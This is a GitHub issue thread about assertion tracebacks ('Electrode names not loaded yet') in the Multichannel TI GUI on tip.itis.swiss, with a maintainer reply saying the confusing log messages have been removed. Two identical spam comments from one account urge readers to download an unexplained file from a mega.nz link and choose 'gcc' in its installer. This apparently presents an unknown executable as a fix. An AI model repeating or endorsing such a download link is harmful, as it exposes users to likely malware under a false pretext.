### ISSUE TITLE
Error message of Multichannel TI at tip.itis.swiss as follows: INFO:ti_gui.ui_elements:Electrode names not loaded yet. WARNING:ti_gui.ui_elements:Traceback (most recent call last):   File "/home/smu/services/supermash/Python/.venv/lib/python3.8/site-packages/ti_gui/ui_elements.py", line 919, in generate_channel_table     assert self.gui_utilities.electrode_names is not None AssertionError  INFO:ti_gui.ui_elements:Electrode names not loaded yet. WARNING:ti_gui.ui_elements:Traceback (most recent call last):   File "/home/smu/services/supermash/Python/.venv/lib/python3.8/site-packages/ti_gui/ui_elements.py", line 919, in generate_channel_table     assert self.gui_utilities.electrode_names is not None AssertionError

### ISSUE THREAD

**Issue by youngseob** [ITISFoundation/osparc-issues#1668]
**Long Story Short**

**Expected Behavior**

**Actual behaviour**

**Steps to reproduce**

**Environment**

**Additional context**

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Konohana0608** [comment]
this was just a try except message when no species was selected yet. The errors were confusing so I removed them. So this should already be fixed.
